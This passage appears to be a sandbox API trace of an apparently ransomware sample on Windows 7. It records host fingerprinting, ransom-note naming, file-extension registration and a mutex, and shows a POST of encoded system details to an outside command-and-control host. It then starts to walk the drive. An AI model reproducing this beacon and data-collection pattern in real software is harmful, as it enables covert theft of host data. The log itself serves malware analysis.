RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x1a) returned 0x4dffb0 [0070.604] _wcsicmp (_Str1="XDUWTFONO", _Str2="NT-AUTORITÄT") returned 10 [0070.604] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4dffb0) returned 1 [0070.604] CloseHandle (hObject=0xb8) returned 1 [0070.604] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x40) returned 0x4d5e20 [0070.604] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Cryptography", ulOptions=0x0, samDesired=0x101, phkResult=0x3ff8f4 | out: phkResult=0x3ff8f4*=0xb8) returned 0x0 [0070.605] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x18) returned 0x4e1c80 [0070.605] RegQueryValueExW (in: hKey=0xb8, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x3ff8f0, lpData=0x3ff82c, lpcbData=0x3ff8ec*=0x80 | out: lpType=0x3ff8f0*=0x1, lpData="0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpcbData=0x3ff8ec*=0x4a) returned 0x0 [0070.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", cchWideChar=-1, lpMultiByteStr=0x3ff8ac, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpUsedDefaultChar=0x0) returned 37 [0070.605] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3ff8ac, Length=0x25) returned 0xee6053d7 [0070.605] RtlComputeCrc32 (PartialCrc=0x53d7, Buffer=0x3ff8ac, Length=0x25) returned 0x119b9ad1 [0070.605] RtlComputeCrc32 (PartialCrc=0x9ad1, Buffer=0x3ff8ac, Length=0x25) returned 0x7dcfdcc8 [0070.605] RtlComputeCrc32 (PartialCrc=0xdcc8, Buffer=0x3ff8ac, Length=0x25) returned 0x2aa4d67d [0070.605] RtlComputeCrc32 (PartialCrc=0xd67d, Buffer=0x3ff8ac, Length=0x25) returned 0x32684d7f [0070.605] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0xf51008, Length=0x10) returned 0x55f9a042 [0070.605] RtlComputeCrc32 (PartialCrc=0xa042, Buffer=0xf51008, Length=0x10) returned 0xc7642d9a [0070.605] RtlComputeCrc32 (PartialCrc=0x2d9a, Buffer=0xf51008, Length=0x10) returned 0x7b1717a3 [0070.605] RtlComputeCrc32 (PartialCrc=0x17a3, Buffer=0xf51008, Length=0x10) returned 0x685a173d [0070.605] RtlComputeCrc32 (PartialCrc=0x173d, Buffer=0xf51008, Length=0x10) returned 0xb56a8cb3 [0070.605] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0xf51008, Length=0x10) returned 0xde887336 [0070.605] RtlComputeCrc32 (PartialCrc=0x7336, Buffer=0xf51008, Length=0x10) returned 0xa6e2b707 [0070.605] RtlComputeCrc32 (PartialCrc=0xb707, Buffer=0xf51008, Length=0x10) returned 0xf066c4d7 [0070.605] RtlComputeCrc32 (PartialCrc=0xc4d7, Buffer=0xf51008, Length=0x10) returned 0x3308edfb [0070.605] RtlComputeCrc32 (PartialCrc=0xedfb, Buffer=0xf51008, Length=0x10) returned 0x506de194 [0070.605] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0xf51008, Length=0x10) returned 0xffa4f3dc [0070.605] RtlComputeCrc32 (PartialCrc=0xf3dc, Buffer=0xf51008, Length=0x10) returned 0xd13f668c [0070.605] RtlComputeCrc32 (PartialCrc=0x668c, Buffer=0xf51008, Length=0x10) returned 0xd14a443d [0070.605] RtlComputeCrc32 (PartialCrc=0x443d, Buffer=0xf51008, Length=0x10) returned 0xfabbb008 [0070.605] RtlComputeCrc32 (PartialCrc=0xb008, Buffer=0xf51008, Length=0x10) returned 0x92e0d151 [0070.605] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4e1c80) returned 1 [0070.605] RegCloseKey (hKey=0xb8) returned 0x0 [0070.605] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4d5e20) returned 1 [0070.606] _swprintf (in: param_1=0xf50a1a, param_2="README%s.TXT" | out: param_1="README.c06622a1.TXT") returned 19 [0070.606] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3ff4e0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0070.611] PathAddBackslashW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\") returned="" [0070.612] wcscat (in: _Dest=0x3ff4e0, _Source="c06622a1" | out: _Dest="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\c06622a1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\c06622a1" [0070.612] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0xa) returned 0x4e1800 [0070.612] wcscat (in: _Dest=0x3ff4e0, _Source=".ico" | out: _Dest="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\c06622a1.ico") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\c06622a1.ico" [0070.612] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4e1800) returned 1 [0070.612] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x16b9) returned 0x4e2468 [0070.612] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x5ae40) returned 0x515fe8 [0070.613] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\c06622a1.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\c06622a1.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0070.615] WriteFile (in: hFile=0x108, lpBuffer=0x515fe8*, nNumberOfBytesToWrite=0x86be, lpNumberOfBytesWritten=0x3ff4b0, lpOverlapped=0x0 | out: lpBuffer=0x515fe8*, lpNumberOfBytesWritten=0x3ff4b0*=0x86be, lpOverlapped=0x0) returned 1 [0070.617] CloseHandle (hObject=0x108) returned 1 [0070.619] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4e2468) returned 1 [0070.619] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x515fe8) returned 1 [0070.619] RegCreateKeyExW (in: hKey=0x80000000, lpSubKey=".c06622a1", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2000000, lpSecurityAttributes=0x0, phkResult=0x3ff8f4, lpdwDisposition=0x0 | out: phkResult=0x3ff8f4*=0x10e, lpdwDisposition=0x0) returned 0x0 [0070.622] wcslen (_String="c06622a1") returned 0x8 [0070.622] RegSetValueExW (in: hKey=0x10e, lpValueName="", Reserved=0x0, dwType=0x1, lpData="c06622a1", cbData=0x12 | out: lpData="c06622a1") returned 0x0 [0070.624] RegCloseKey (hKey=0x10e) returned 0x0 [0070.624] wcscpy (in: _Dest=0x3ff6e8, _Source="c06622a1" | out: _Dest="c06622a1") returned="c06622a1" [0070.624] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x1a) returned 0x4e0000 [0070.624] wcscat (in: _Dest=0x3ff6e8, _Source="\\DefaultIcon" | out: _Dest="c06622a1\\DefaultIcon") returned="c06622a1\\DefaultIcon" [0070.624] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4e0000) returned 1 [0070.624] RegCreateKeyExW (in: hKey=0x80000000, lpSubKey="c06622a1\\DefaultIcon", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2000000, lpSecurityAttributes=0x0, phkResult=0x3ff8f4, lpdwDisposition=0x0 | out: phkResult=0x3ff8f4*=0x112, lpdwDisposition=0x0) returned 0x0 [0070.625] wcslen (_String="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\c06622a1.ico") returned 0x38 [0070.625] RegSetValueExW (in: hKey=0x112, lpValueName="", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\c06622a1.ico", cbData=0x72 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\c06622a1.ico") returned 0x0 [0070.626] SHChangeNotify (wEventId=134217728, uFlags=0x1000, dwItem1=0x0, dwItem2=0x0) [0071.599] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaDesktop06cfe7f5d88e82f7adda6d8333ca8b302debb22904c68a942188be5730e9b3c8.exe\" " [0071.600] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaDesktop06cfe7f5d88e82f7adda6d8333ca8b302debb22904c68a942188be5730e9b3c8.exe\" ", pNumArgs=0x3ff908 | out: pNumArgs=0x3ff908) returned 0x4e6750*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaDesktop06cfe7f5d88e82f7adda6d8333ca8b302debb22904c68a942188be5730e9b3c8.exe" [0071.600] GetModuleFileNameW (in: hModule=0xf40000, lpFilename=0x3ff6e8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaDesktop06cfe7f5d88e82f7adda6d8333ca8b302debb22904c68a942188be5730e9b3c8.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cusersgrujadesktop06cfe7f5d88e82f7adda6d8333ca8b302debb22904c68a942188be5730e9b3c8.exe")) returned 0x7c [0071.600] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaDesktop06cfe7f5d88e82f7adda6d8333ca8b302debb22904c68a942188be5730e9b3c8.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cusersgrujadesktop06cfe7f5d88e82f7adda6d8333ca8b302debb22904c68a942188be5730e9b3c8.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0071.600] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xec00 [0071.600] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0xec00) returned 0x4e6a78 [0071.600] ReadFile (in: hFile=0x128, lpBuffer=0x4e6a78, nNumberOfBytesToRead=0xec00, lpNumberOfBytesRead=0x3ff8f0, lpOverlapped=0x0 | out: lpBuffer=0x4e6a78*, lpNumberOfBytesRead=0x3ff8f0*=0xec00, lpOverlapped=0x0) returned 1 [0071.601] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4e6a78, Length=0xec00) returned 0xb260dcda [0071.602] RtlComputeCrc32 (PartialCrc=0xdcda, Buffer=0x4e6a78, Length=0xec00) returned 0x3a311511 [0071.602] RtlComputeCrc32 (PartialCrc=0x1511, Buffer=0x4e6a78, Length=0xec00) returned 0x7ba139e [0071.602] RtlComputeCrc32 (PartialCrc=0x139e, Buffer=0x4e6a78, Length=0xec00) returned 0xad293c01 [0071.602] RtlComputeCrc32 (PartialCrc=0x3c01, Buffer=0x4e6a78, Length=0xec00) returned 0x51828e73 [0071.602] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4e6a78) returned 1 [0071.602] CloseHandle (hObject=0x128) returned 1 [0071.603] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\1115313a9e13ba07013c29ad738e8251") returned 0x0 [0071.603] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="Global\\1115313a9e13ba07013c29ad738e8251") returned 0x128 [0071.603] SetThreadExecutionState (esFlags=0x80000001) returned 0x80000000 [0071.603] GetSystemDefaultUILanguage () returned 0x409 [0071.606] GetUserDefaultLangID () returned 0x409 [0071.606] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x2f) returned 0x4dc1c0 [0071.606] GetLogicalDriveStringsW (in: nBufferLength=0x104, lpBuffer=0x3ff17c | out: lpBuffer="C:\\") returned 0x4 [0071.606] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0071.606] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x0, lpTotalNumberOfBytes=0x3ff38c, lpTotalNumberOfFreeBytes=0x3ff384 | out: lpFreeBytesAvailableToCaller=0x0, lpTotalNumberOfBytes=0x3ff38c, lpTotalNumberOfFreeBytes=0x3ff384) returned 1 [0071.607] _swprintf (in: param_1=0x3ff5c0, param_2="%u/%u|" | out: param_1="485/511|") returned 8 [0071.607] wcslen (_String="C:485/511") returned 0x9 [0071.607] GetUserNameW (in: lpBuffer=0x3ff844, pcbBuffer=0x3ff8a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x3ff8a8) returned 1 [0071.609] GetComputerNameW (in: lpBuffer=0x3ff804, nSize=0x3ff8a8 | out: lpBuffer="XDUWTFONO", nSize=0x3ff8a8) returned 1 [0071.609] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x40) returned 0x4d5f40 [0071.609] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop\\MuiCached", ulOptions=0x0, samDesired=0x101, phkResult=0x3ff390 | out: phkResult=0x3ff390*=0x134) returned 0x0 [0071.609] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x38) returned 0x4e2958 [0071.609] RegQueryValueExW (in: hKey=0x134, lpValueName="MachinePreferredUILanguages", lpReserved=0x0, lpType=0x3ff38c, lpData=0x3ff180, lpcbData=0x3ff388*=0x208 | out: lpType=0x3ff38c*=0x7, lpData=0x3ff180*, lpcbData=0x3ff388*=0xc) returned 0x0 [0071.609] wcscpy (in: _Dest=0x3ff884, _Source="en-US" | out: _Dest="en-US") returned="en-US" [0071.609] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4e2958) returned 1 [0071.609] RegCloseKey (hKey=0x134) returned 0x0 [0071.609] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4d5f40) returned 1 [0071.609] NetGetJoinInformation (in: lpServer=0x0, lpNameBuffer=0x3ff38c, BufferType=0x3ff390 | out: lpNameBuffer=0x3ff38c*="WORKGROUP", BufferType=0x3ff390) returned 0x0 [0071.614] wcscpy (in: _Dest=0x3ff3b4, _Source="WORKGROUP" | out: _Dest="WORKGROUP") returned="WORKGROUP" [0071.614] wcslen (_String="WORKGROUP") returned 0x9 [0071.614] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4dbcc8) returned 1 [0071.614] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x5a) returned 0x4e2ee0 [0071.614] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x101, phkResult=0x3ff390 | out: phkResult=0x3ff390*=0x140) returned 0x0 [0071.614] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x18) returned 0x4e1dc0 [0071.614] RegQueryValueExW (in: hKey=0x140, lpValueName="ProductName", lpReserved=0x0, lpType=0x3ff38c, lpData=0x3ff180, lpcbData=0x3ff388*=0x208 | out: lpType=0x3ff38c*=0x1, lpData="Windows 7 Professional", lpcbData=0x3ff388*=0x2e) returned 0x0 [0071.614] wcscpy (in: _Dest=0x3ff7c4, _Source="Windows 7 Professional" | out: _Dest="Windows 7 Professional") returned="Windows 7 Professional" [0071.615] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4e1dc0) returned 1 [0071.615] RegCloseKey (hKey=0x140) returned 0x0 [0071.615] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4e2ee0) returned 1 [0071.615] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x40) returned 0x4d5f88 [0071.615] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Cryptography", ulOptions=0x0, samDesired=0x101, phkResult=0x3ff390 | out: phkResult=0x3ff390*=0x140) returned 0x0 [0071.615] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x18) returned 0x4e1dc0 [0071.615] RegQueryValueExW (in: hKey=0x140, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x3ff38c, lpData=0x3ff2c8, lpcbData=0x3ff388*=0x80 | out: lpType=0x3ff38c*=0x1, lpData="0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpcbData=0x3ff388*=0x4a) returned 0x0 [0071.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", cchWideChar=-1, lpMultiByteStr=0x3ff348, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpUsedDefaultChar=0x0) returned 37 [0071.615] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3ff348, Length=0x25) returned 0xee6053d7 [0071.615] RtlComputeCrc32 (PartialCrc=0x53d7, Buffer=0x3ff348, Length=0x25) returned 0x119b9ad1 [0071.615] RtlComputeCrc32 (PartialCrc=0x9ad1, Buffer=0x3ff348, Length=0x25) returned 0x7dcfdcc8 [0071.615] RtlComputeCrc32 (PartialCrc=0xdcc8, Buffer=0x3ff348, Length=0x25) returned 0x2aa4d67d [0071.615] RtlComputeCrc32 (PartialCrc=0xd67d, Buffer=0x3ff348, Length=0x25) returned 0x32684d7f [0071.615] wcslen (_String="d19a9b11c8dccf7d7dd6") returned 0x14 [0071.615] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4e1dc0) returned 1 [0071.615] RegCloseKey (hKey=0x140) returned 0x0 [0071.615] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4d5f88) returned 1 [0071.615] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x8) returned 0x4e4e40 [0071.615] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x20c) returned 0x4e5228 [0071.615] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x142) returned 0x4e5440 [0071.615] _swprintf (in: param_1=0x4e5228, param_2="\"os\":{\r\n\"lang\":\"%s\",\r\n\"username\":\"%s\",\r\n\"hostname\":\"%s\",\r\n\"domain\":\"%s\",\r\n\"os_type\":\"windows\",\r\n\"os_version\":\"%s\",\r\n\"os_arch\":\"%s\",\r\n\"disks\":\"%s\",\r\n\"id\":\"%s\"\r\n}" | out: param_1="\"os\":{\r\n\"lang\":\"en-US\",\r\n\"username\":\"5p5NrGJn0jS HALPmcxz\",\r\n\"hostname\":\"XDUWTFONO\",\r\n\"domain\":\"WORKGROUP\",\r\n\"os_type\":\"windows\",\r\n\"os_version\":\"Windows 7 Professional\",\r\n\"os_arch\":\"x64\",\r\n\"disks\":\"C:485/511\",\r\n\"id\":\"d19a9b11c8dccf7d7dd6\"\r\n}") returned 241 [0071.615] RtlReAllocateHeap (Heap=0x4c0000, Flags=0x8, Ptr=0x4e5228, Size=0xf2) returned 0x4e5228 [0071.615] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4e5440) returned 1 [0071.615] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4e4e40) returned 1 [0071.616] strlen (_Str="{\r\n\"bot\":{\r\n\"ver\":\"%s\",\r\n\"uid\":\"%s\"\r\n},\r\n%s\r\n}") returned 0x2e [0071.616] strlen (_Str="\"os\":{\r\n\"lang\":\"en-US\",\r\n\"username\":\"5p5NrGJn0jS HALPmcxz\",\r\n\"hostname\":\"XDUWTFONO\",\r\n\"domain\":\"WORKGROUP\",\r\n\"os_type\":\"windows\",\r\n\"os_version\":\"Windows 7 Professional\",\r\n\"os_arch\":\"x64\",\r\n\"disks\":\"C:485/511\",\r\n\"id\":\"d19a9b11c8dccf7d7dd6\"\r\n}") returned 0xf1 [0071.616] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x13b) returned 0x4e5328 [0071.616] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x8) returned 0x4e4e40 [0071.616] sprintf (in: _Dest=0x4e5328, _Format="{\r\n\"bot\":{\r\n\"ver\":\"%s\",\r\n\"uid\":\"%s\"\r\n},\r\n%s\r\n}" | out: _Dest="{\r\n\"bot\":{\r\n\"ver\":\"1.8.6.2\",\r\n\"uid\":\"76007bd49d0d185\"\r\n},\r\n\"os\":{\r\n\"lang\":\"en-US\",\r\n\"username\":\"5p5NrGJn0jS HALPmcxz\",\r\n\"hostname\":\"XDUWTFONO\",\r\n\"domain\":\"WORKGROUP\",\r\n\"os_type\":\"windows\",\r\n\"os_version\":\"Windows 7 Professional\",\r\n\"os_arch\":\"x64\",\r\n\"disks\":\"C:485/511\",\r\n\"id\":\"d19a9b11c8dccf7d7dd6\"\r\n}\r\n}") returned 303 [0071.616] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x100) returned 0x4e3dd8 [0071.616] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4e3dd8) returned 1 [0071.616] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x270) returned 0x4e5470 [0071.616] strlen (_Str="76007bd49d0d185") returned 0xf [0071.616] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x1c5) returned 0x4e56e8 [0071.616] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x509ac23c [0071.616] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x49de9a5d [0071.616] sprintf (in: _Dest=0x4e56e8, _Format="%.8x=%s&%.8x=%s" | out: _Dest="49de9a5d=hDjfX+ir9cY+ICGbFMTTLCLdGway1aiYxI1UZfIgWufiDx2Xls7vjN1m+2l/hmlp82T+4D//332z1qZVjnuO2gu5kHuvgLzYrSa10V59/R8tAB+mx+F2pzdwRPLnvNdTOhx1qcYKmVJ6e5Z+NUmJoxTIx9pwl+JFaNC0O76w5kq7iPngmCyPjToLQy+HxRs8YZY26740eAk2fcjnJgvDpQB7oZtYCxYTjQ/l2rlGLBFUmnmFtFdJpB7wYMu5w3qptr2usm9qW+5bCda71q+iVqQYR0K7HhBi2Iy9husjyyI9vLAkRRYYnk2pifQGPVMV2+QIOa59J+RXfy+mYj+whWe1NfuBbbHVNU1Vu6YP9ztoYxnzb4hb9HhqKm/E5YedZglsJVgkQ8WnIYE5v9iQlhG0wxOv2+oP&28cc7a69=76007bd49d0d185") returned 450 [0071.616] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x9c) returned 0x4e3dd8 [0071.618] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/80.0", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0074.517] InternetConnectW (hInternet=0xcc0004, lpszServerName="securebestapp20.com", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0074.544] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6008269f [0074.544] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7bec0280 [0074.544] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x50eec [0074.544] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x21eb7c09 [0074.544] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7dbb626a [0074.544] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x72c67a8 [0074.544] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x69186bfd [0074.544] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x10ceb067 [0074.544] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4c567918 [0074.544] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6766adfd [0074.544] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7fa4f32b [0074.545] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x9593b3d [0074.545] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/IdpwMjccw", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0076.389] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0xc8) returned 0x4f00c0 [0076.389] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x3ff894, lpdwBufferLength=0x3ff890 | out: lpBuffer=0x3ff894, lpdwBufferLength=0x3ff890) returned 1 [0076.417] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x3ff894, dwBufferLength=0x4) returned 1 [0076.421] wcslen (_String="\r\nAccept: */*\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate, br\r\nContent-Type: text/plain") returned 0x63 [0076.421] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="\r\nAccept: */*\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate, br\r\nContent-Type: text/plain", dwHeadersLength=0x63, lpOptional=0x4e56e8*, dwOptionalLength=0x1c2) returned 1 [0094.324] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x3ff83e, lpdwBufferLength=0x3ff88c, lpdwIndex=0x3ff888*=0x0 | out: lpBuffer=0x3ff83e*, lpdwBufferLength=0x3ff88c*=0x6, lpdwIndex=0x3ff888*=0x0) returned 1 [0094.325] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0094.325] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0094.325] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0094.325] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4f00c0) returned 1 [0094.325] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4e3dd8) returned 1 [0094.325] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4e56e8) returned 1 [0094.325] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4e5470) returned 1 [0094.325] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4e4e40) returned 1 [0094.325] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4e5228) returned 1 [0094.325] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4dc1c0) returned 1 [0094.325] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4e5328) returned 1 [0094.325] GetLogicalDriveStringsW (in: nBufferLength=0x80, lpBuffer=0x3ff7bc | out: lpBuffer="C:\\") returned 0x4 [0094.326] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0094.326] wcscpy (in: _Dest=0x3ff8c4, _Source="C:\\" | out: _Dest="C:\\") returned="C:\\" [0094.326] wcscpy (in: _Dest=0x3fef04, _Source="\\\\?\\C:\\" | out: _Dest="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0094.326] wcslen (_String="\\\\?\\C:\\") returned 0x7 [0094.326] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\*recycle*", fInfoLevelId=0x0, lpFindFileData=0x3fecb4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fecb4) returned 0x4faec0 [0094.326] wcscpy (in: _Dest=0x3ff138, _Source="\\\\?\\C:\\" | out: _Dest="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0094.326] wcslen (_String="\\\\?\\C:\\") returned 0x7 [0094.326] wcscpy (in: _Dest=0x3ff146, _Source="$Recycle.Bin" | out: _Dest="$Recycle.Bin") returned="$Recycle.Bin" [0094.326] FindClose (in: hFindFile=0x4faec0 | out: hFindFile=0x4faec0) returned 1 [0094.326] wcscpy (in: _Dest=0x3ff340, _Source="\\\\?\\C:\\$Recycle.Bin" | out: _Dest="\\\\?\\C:\\$Recycle.Bin") returned="\\\\?\\C:\\$Recycle.Bin" [0094.326] wcslen (_String="\\\\?\\C:\\$Recycle.Bin") returned 0x13 [0094.326] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-*", fInfoLevelId=0x0, lpFindFileData=0x3ff548, fSearchOp=0x0, lpSearchFilter=0x0, 